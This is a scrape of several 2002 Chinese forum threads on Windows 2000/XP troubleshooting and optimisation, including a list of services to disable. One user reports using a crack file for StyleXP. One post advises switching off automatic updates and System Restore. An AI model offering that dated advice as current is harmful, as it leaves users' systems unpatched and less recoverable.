 发表于 2002-01-05 08:50:30 按此观看阿嘉的个人资料 按此发邮件给阿嘉 访问阿嘉的主页 阿嘉 的 oicq 是45702,查看 45702 的资料 发送悄悄话给阿嘉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿嘉的IP
我看是联想主板的问题，他出的东西没什么好货。呵呵~~~
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-07 12:03:48 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
阿嘉在上个帖子中说
引用:
我看是联想主板的问题，他出的东西没什么好货。呵呵~~~

不可能，我公司里有两台就用815EP，好好的，我自己估计是显卡太老了~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-07 16:53:20 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP

怪~

检查硬盘有没有坏道~
cmos cpu 二级缓存有没有开~

如果是显卡问题进安全模式和vga模式应该不会有多大影响~~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-08 19:20:54 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
问题解决了，如我所料，Win2000对显卡还是有要求的，我的i740该退休了，换成ATI Radeon就OK了~~~

谢谢大家~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-08 20:44:12 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
POPOEVER在上个帖子中说
引用:
问题解决了，如我所料，Win2000对显卡还是有要求的，我的i740该退休了，换成ATI Radeon就OK了~~~

谢谢大家~~~

I740通常在WIN2000下没有问题的~

ATI Radeon 用这个卡~奢侈~
偶自己家的还在用SIS6326~

[这消息被yunbin编辑过(编辑时间2002-01-08 20:45:18)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

秋天的小乐

终级用户
积分：806
发帖：456
来自：京西
注册：2000-11-13
 发表于 2002-01-08 23:44:16 按此观看秋天的小乐的个人资料 按此发邮件给秋天的小乐 访问秋天的小乐的主页 秋天的小乐 的 oicq 是7545653,查看 7545653 的资料 发送悄悄话给秋天的小乐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋天的小乐的IP
对显卡要求不高的。你的cmos设的是不是有问题？2000基于nt构建，服务功能强大但对于多媒体功能支持不是很好哟！

老婆被泡，马子被翘，脏款被盗，让汽车撞出人行道。
OICQ-7545653
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-08 23:54:18 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
yunbin在上个帖子中说
引用:
POPOEVER在上个帖子中说
引用:
问题解决了，如我所料，Win2000对显卡还是有要求的，我的i740该退休了，换成ATI Radeon就OK了~~~

谢谢大家~~~

I740通常在WIN2000下没有问题的~

ATI Radeon 用这个卡~奢侈~
偶自己家的还在用SIS6326~

二级缓存一直是开的，事实证明i740不行，当然也有可能是我的i740不行~~~
ATI Radeon也有便宜的，我搞了张UNIKA的616，32MB SDRAM的，才400，呵呵，好歹也算是镭啊~~~
Win2K对多媒体支持不好？此话从何说起？

[这消息被POPOEVER编辑过(编辑时间2002-01-08 23:56:35)]

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 主题：win2K的安装问题~~~
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


为什么我的winxp关机有时快有时特别慢 - 经 典 论 坛

计算机技术
为什么我的winxp关机有时快有时特别慢

上一贴 | 下一贴
发表人 | 主题: 为什么我的winxp关机有时快有时特别慢
西门吹牛 终级用户 积分：692 发帖：283 来自：杭州 注册：2000-09-29 | 发表于 2002-01-10 08:35:56 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 收藏该主题供以后查看 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP 快的时候3，4秒就够了，慢的时候要两分钟。 我用的是神州版的，驱动全是winxp自己找到的。难道还有什么问题么？ 我将一直寻找下去......
AirTree 超级用户 积分：375 发帖：231 来自：无人地带 注册：2001-12-07 | 发表于 2002-01-10 13:03:02 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP 关机的时候，系统需要将驻留后台的数据量进行存盘处理，如果你后台驻留的进程或者活动的数据较多，关机的速度就会比较慢（XP就是这个毛病！后台运行太多，对于CPU和内存的消耗太大）。建议关机前手动清除后台进程（如果你觉得必要的话）。 另外，如果你的主板是VIA的芯片，强烈建议下载最新的主板补丁，因为关系到高级电源管理的问题（我的主板就是这样，开始不能正常关机，打了补丁一切OK！） 打雷了！下雨了！大家快回家收衣服啊……
上一贴 | 下一贴
快速回复 主题：为什么我的winxp关机有时快有时特别慢
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


一个关于NT的问题 - 经 典 论 坛

计算机技术
一个关于NT的问题

上一贴 | 下一贴
发表人 | 主题: 一个关于NT的问题
绿色地带 初级用户 积分：0 发帖：0 来自：中国云南保山 注册：2002-01-03 | 发表于 2002-01-10 14:18:32 按此观看绿色地带的个人资料 按此发邮件给绿色地带 绿色地带 的 oicq 是54362132,查看 54362132 的资料 收藏该主题供以后查看 发送悄悄话给绿色地带 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看绿色地带的IP 各位高手: 大家好！ 我目前遇到一个关于nt的问题，措手不及，请各位高手解答。 安装一个在2000下开发的软件，重启NT服务器后，桌面什么也没有，提示说Explorer.exe中断错误，不知怎么才能修复，在启动时按住F8键也没有用，请各位高手解答，谢谢！ 李奎
大哥 超级用户 积分：322 发帖：112 来自： 注册：2001-12-20 | 发表于 2002-01-11 20:27:20 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 是某个系统文件被覆盖了，NT中没有系统文件保护功能，因此会出现这种问题。具体哪个文件忘了，可以通过查看那个安装程序中的系统文件试猜出来。 解决办法是用紧急修复启动盘启动后（如果用了NTFS的话，呵呵），进入NT所在的分区，拷贝一个NT版本的即可。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 主题：一个关于NT的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


Win2K里的服务 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
Win2K里的服务

上一贴 | 下一贴
发表人 | 主题: Win2K里的服务
jet 我心飞翔 现任版主 积分：5452 发帖：1690 来自：Xi`an 注册：2000-06-18 | 发表于 2002-01-13 09:05:38 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 收藏该主题供以后查看 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 我想把另一个程序(CS服务器，因为他开启的时候老有一个dos窗口)也启动为服务，该怎么添加 ？ Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
大哥 超级用户 积分：322 发帖：112 来自： 注册：2001-12-20 | 发表于 2002-01-13 21:27:45 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP service程序需要特别的格式，不是任何可执行文件都可以当作service运行的。 CS服务器不是service程序，因此不行。 老哥我知道的就这么多了。
jet 我心飞翔 现任版主 积分：5452 发帖：1690 来自：Xi`an 注册：2000-06-18 | 发表于 2002-01-13 22:32:55 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 明白了！谢谢！ Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
上一贴 | 下一贴
快速回复 主题：Win2K里的服务
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


怎样将"我的文档"改放在d:\ ? - 经 典 论 坛

计算机技术
怎样将"我的文档"改放在d:\ ?

上一贴 | 下一贴
发表人 | 主题: 怎样将"我的文档"改放在d:\ ?
sony 终级用户 积分：1222 发帖：329 来自：浙江省 注册：2001-10-05 | 发表于 2002-02-04 22:53:57 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 收藏该主题供以后查看 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP 如上，谢谢！ 许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-02-04 22:55:38 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 右键-->属性 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
上一贴 | 下一贴
快速回复 主题：怎样将"我的文档"改放在d:\ ?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


为什么XP主题用不了？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
为什么XP主题用不了？

上一贴 | 下一贴
发表人 | 主题: 为什么XP主题用不了？
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-02-05 09:23:58 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 收藏该主题供以后查看 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 不论是考入theme目录，还是直接打开，都无法使用……菜单上压根就没有选项！ 甚至安装styleXP也不行，一运行就死机！ 大家有没有碰到这个毛病？ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
dancing 叶恨花 现任版主 积分：4737 发帖：2230 来自：|二进制情感天空| 注册：2000-12-11 | 发表于 2002-02-05 09:28:55 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP .THEME是主题文件,.STYLE是配色文件,XP本身只支持前一中,后一种它会很弱智的给你忽略,如果你把.THEME放到Theme目录,XP其实是认出来了,但你看不出什么效果,因为有配合的.STYLE文件没法用,只有用StyleXP了,可能是你的StyleXP有问题,建议安装最新的StyleXPPlusBeta6.1版. 情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… … Blueidea Web Team Moderator Of Photoshop & Imagerady Forum
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-02-05 09:42:24 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 可是我就是安的就是plus6.1啊！ 安装正常，安装后测试也可以，可是只要后来想修改，一点击theme或style按钮，就出错！ 救救我吧！ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
dancing 叶恨花 现任版主 积分：4737 发帖：2230 来自：|二进制情感天空| 注册：2000-12-11 | 发表于 2002-02-05 09:50:02 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP 什么错误信息?还是就直接退出了?我装的没有任何问题,换个Theme和Style,看有没有不报错的. 情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… … Blueidea Web Team Moderator Of Photoshop & Imagerady Forum
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-02-05 15:00:04 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 谢谢大家帮忙！ 已经解决，stylexp有一个破解文件，下载使用后即可！ 奇怪的是使用后其他.STYLE之类不需要stylexp也可以使用了……怪！ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
上一贴 | 下一贴
快速回复 主题：为什么XP主题用不了？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请教windows xp的优化方法！ - 经 典 论 坛

计算机技术
请教windows xp的优化方法！

上一贴 | 下一贴
发表人 主题: 请教windows xp的优化方法！
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2002-02-07 09:31:40 按此观看kjseven的个人资料 按此发邮件给kjseven 收藏该主题供以后查看 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
如题 。。。
谢谢。
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-07 10:12:48 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
闭系统还原功能
虽然Windows XP的系统还原是其卖点之一，但建议你还是关闭这个设置。系统还原要求巨大的硬盘空间，默认的设置是在每个分区都有还原点，记录每个分区的软件安装和使用状态，如果你迫不及待地按默认的设置来使用计算机的话，用不了一周，你的硬盘就会塞满数以G计的、这种还原功能产生的巨大文件；而且系统还原要进行大量的数据读写硬盘，CPU的占用率也是很大的，目前多数人的机器还是停留在G级别以下的CPU里，速度可能会受影响。所以除非你的硬件真是很顶级的配置，而且也需要经常地安装测试新软件或变更系统的设置，对XP的系统还原功能真的是用得着，否则还是关闭了它，老老实实用软件本身的卸载功能吧。

如果真的想体会一下这种新功能，折衷的办法是，可以把其他分区的还原功能关闭，留下你安装XP的分区，这样可以对Windows的状态进行记录和有选择地恢复。象你装游戏和放图片、MP3的分区，完全没必要用系统还原功能。

任务栏中的“分组相似任务栏按钮”设置
这要看你的最常用的应用而定。“分组相似任务栏按钮”设置虽然可以让你的任务栏少开窗口，保持干净，但是如果你是经常用QQ这样的通讯软件和人在线聊天的话，如果有两个以上的好友同时和你交谈，你马上会感到XP这种默认设置造成的不便――每次你想切换交谈对象的时候，要先点击组，然后再弹出的菜单里选要交谈的好友，而且每个好友在组里显示的都是一样的图标，谈话对象多的时候，你可能要一个个的点击来看到底刚才是谁回复了话，在等着你反应，而且选错了一个，又得从组开始选，很麻烦。显然地，这样不如原来的开出几个窗口，在任务栏里的各个小窗口点击一次就可进行开始聊天。

XP的这种默认设置是为了方便用户浏览网页而设计的。所以建议你要根据自己的实际应用来更改这种设置，真的要经常上网浏览的话，其实用一个MYIE这样的IE内核浏览器，可以不影响QQ的使用，又不占用多个任务栏位置，一举两得。更改的办法是：开始－控制面板－外观和主题－任务栏和开始菜单，去掉“分组相似任务栏按钮”选项前面的钩。

文本文件和邮件的最大化技巧
从Windows2000开始，当你点击存放在硬盘里的后缀名为EML的邮件的时候，默认的状态总不是最大化的，而是一个讨厌的小窗口，而且不具备记忆状态的能力，当你最大化这个窗口后，下次打开邮件又是一个小窗口。文本文件也有类似的情况。这估计是微软的设计上的疏忽，在正规的帮助文件和设置选项里，都没这个记忆最大化问题的说明或选项。
你可以用拖动窗口大小办法来让Windows记忆最大化的状态：打开一个EML邮件后，千万不要点击最大化的按钮，而是要移动指针到小窗口的边缘，按住鼠标左键把窗口上下左右都拉到屏幕的最大状态，然后点击关闭。下次你将发现凡是打开这种文件，Windows都自动地最大化了。文本文件TXT也是如此。

但是要提醒大家的是，在Windows 98里，却不是用这样的技巧。98里要邮件记忆最大化状态，必须先最大化一个打开的邮件，然后点击回复，回复的界面就会最大化，Windows这样也记住了其最大化的状态。在Windows 9X里如果你是单纯的拖放窗口或是每次都最大化邮件，是无效的。

关闭自动更新、目录共享和远程协助支持
这些和Windows2000里一样，都是些专门为网络应用设计的功能。对于国内的多数人而言，微软的Windows自动更新和远程协助都是没什么用的；如果你设置了目录共享，像FUNLOVE这样的专门在局域网里肆虐的病毒就很难清除，所以没什么特殊应用的话，建议关闭为好。可以在系统选项和服务管理里关闭这些功能。

如果你的电脑硬件配置不高，XP的视觉特效如动画窗口、淡入淡出也请关闭了，以免影响速度。

休眠键的设置
XP安装后，默认的设置是用户按键盘上的休眠键，计算机不作任何操作。因为XP的休眠是一种挂起到硬盘的功能，即使你完全切断电源，XP在下次开机的时候，也能从硬盘里储存的数据读出上次开机的状态，迅速地恢复加快用户的开机时间。这样的功能，和Windows9X里的休眠不能切断电源是有区别的，唤醒的时间也比9X里长，但重新开机后进入Windows速度就快很多。XP考虑到用户使用习惯和XP与某些老电源的兼容性问题，就设置为无效。你可以在控制面板里的电源管理中，重新把休眠键设置为有效，我建议你设置为弹出菜单，这样可以选择休眠、关机或是注销。

因为XP的休眠先要从内存中读取系统的当前状态，所以要求占用和你物理内存容量相等的硬盘空间，默认是在C盘的，所以用户要根据自己硬件的实际能力来设置。设置了休眠键后，有的主板电源要重新启动XP才有效，设置后马上按SLEEP来试验，是无反应的；但有的又能立即生效。注意了，如果你的主板电池掉电，导致日期不正确，而XP又没激活的话，休眠后可能会因为日期问题被XP检测到要求激活，否则就锁定系统。

xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-07 17:44:16 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
找个优化软件，在自己动手
imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-07 19:38:48 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
我现在觉得其实使用XP的话，优化其实并没有那么重要的，完全要看机器的配置，如果机器过得去，适当的关掉一些功能完全就可以了，如果机器实在太滥，那么，无论你怎么优化，你都会觉得系统使用的不舒服，而且还会老是出错！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
茕若

姑妄言
积分：1188
发帖：545
来自：沈阳,辽宁,中国
注册：2000-12-30
 发表于 2002-02-07 19:54:30 按此观看茕若的个人资料 按此发邮件给茕若 访问茕若的主页 茕若 的 oicq 是19014396,查看 19014396 的资料 发送悄悄话给茕若 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看茕若的IP
http://www.pconline.com.cn/pcedu/soft/st/winxp/10112/21981.html
http://www.pconline.com.cn/pcedu/soft/st/winxp/10112/25134.html
http://www.pconline.com.cn/pcedu/soft/st/winxp/10201/28291.html
http://www.pconline.com.cn/pcedu/soft/st/winxp/10202/33881.html
http://www.pconline.com.cn/pcedu/soft/st/winxp/10202/34545.html

就是兔子寂寞也会死翘翘的......
Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-02-07 23:14:39 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
也可以试试TweakUI FOR XP,在PowerToys里,当然PowerToys也非常好玩

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2002-02-08 06:36:45 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
用windows优化大师好吗？
xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-08 09:08:11 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
可以！
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-02-08 18:13:55 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
http://www.softreadme.com

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

上一贴 | 下一贴
快速回复 主题：请教windows xp的优化方法！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


禁用服务组件，给你的Windows XP加速 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
禁用服务组件，给你的Windows XP加速

上一贴 | 下一贴
发表人 主题: 禁用服务组件，给你的Windows XP加速
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-14 21:37:13 按此观看dancing的个人资料 按此发邮件给dancing 收藏该主题供以后查看 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
如果你只是在单机使用Windows XP，那么很多服务组件是根本不需要的，额外的服务程序大大拖慢了系统的速度，完全可以将这些多余的服务组件禁用。

下面我们就来看一下怎样关掉不必要的服务。单击“开始”→“设置”→“控制面板”。双击“管理工具”→“服务”，打开后将看到服务列表，有些服务已经启动，有些则没有。右键单击要配置的服务，然后单击“属性”。 在“常规”选项卡上选择“自动”、“手动”或“禁用”，其中“自动”表示每次系统启动时，Windows XP都自动启动该服务；“手动”表示Windows XP不会自动启动该服务，而是在你需要该服务时手动启动该服务；而“禁用”则表示不允许启动该服务。在实际配置时，选择“手动”或者“禁用”都可以实现关闭该服务的目的，推荐使用手动功能，这样你随时可以启动一些临时需要的服务。

有些服务是Windows XP所必需的，不能关闭，否则将会造成系统崩溃。至于各项服务的功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。下面我们就先来看一看这些服务的说明，最后再看哪些服务可以关掉（见下表）。

对于我们这些单机使用Windows XP的普通用户来说，可以把表中服务关闭，如果你有特殊要求，可以参照表中说明自行配置Windows XP的服务，以便达到最优状态。

服务名称 如果符合下列条件，你可以将之关闭
alerter 你未连上局域网并且不需要管理警报
clipbook 你不需要查看远程剪贴簿的剪贴页面
distributed link tracking client 若不使用ntfs分区并且没有联入局域网
distributed transaction coordinator 不需要同时处理多个数据库或者文件系统
fax service 不用windows 2000发送或者接收传真
ftp publishing service 你的计算机不做ftp服务器
iis admin service 你的计算机不做www服务器
indexing service 你的计算机不提供远程文件索引和快速访问或者没有连上局域网
internet connection sharing 你不准备用windows 2000做路由服务器，让多人共享一条线路上网
ipsec policy agent 你未连接到windows 2000的域
logical disk manager administrative service 你不准备使用磁盘配额
message queuing 你未连接到windows 2000的域
messenger 你未连接到windows 2000的域并且不需要管理警报
net logon 你不想让局域网上的其他用户登录
netmeeting remote desktop sharing 你不想使用netmeeting远程管理计算机
network dde 你没有连入局域网
network dde dsdm 你没有连入局域网
performance logs and alerts 若不想知道计算机每一秒都干什么
qos rsvp 你没有使用依赖于qos的程序
remote access auto connection manager 你不想在程序企图读取网络信息时自动连接到网络
remote procedure call (rpc) locator 你不需要管理rpc名称服务数据库
routing and remote access 你的计算机不做路由器
runas service 你不需要在某一用户下以另外一个用户的身份执行一个程序
simple mail transport protocol (smtp) 你的计算机不做邮件发送服务器
smart card 你没有智能卡阅读器
smart card helper 你没有旧式智能卡阅读器
snmp trap service 你没有连接到windows 2000的域
tcp/ip netbios helper service 你的计算机不准备让别人共享
tcp/ip print server 不让你的计算机成为网络打印服务器
telnet 不想远程控制计算机执行控制台命令
uninterruptible power supply 没使用ups或ups不支持双向传输信号
utility manager 不从一个窗口中启动和配置辅助工具
windows management instrumentation 你不看你的系统管理信息
world wide web publishing service 你的计算机不做www服务器
（供稿：子尧）

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-14 21:40:58 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
这篇文章我前两天看过了，
试了一下，好象没有太大变化！

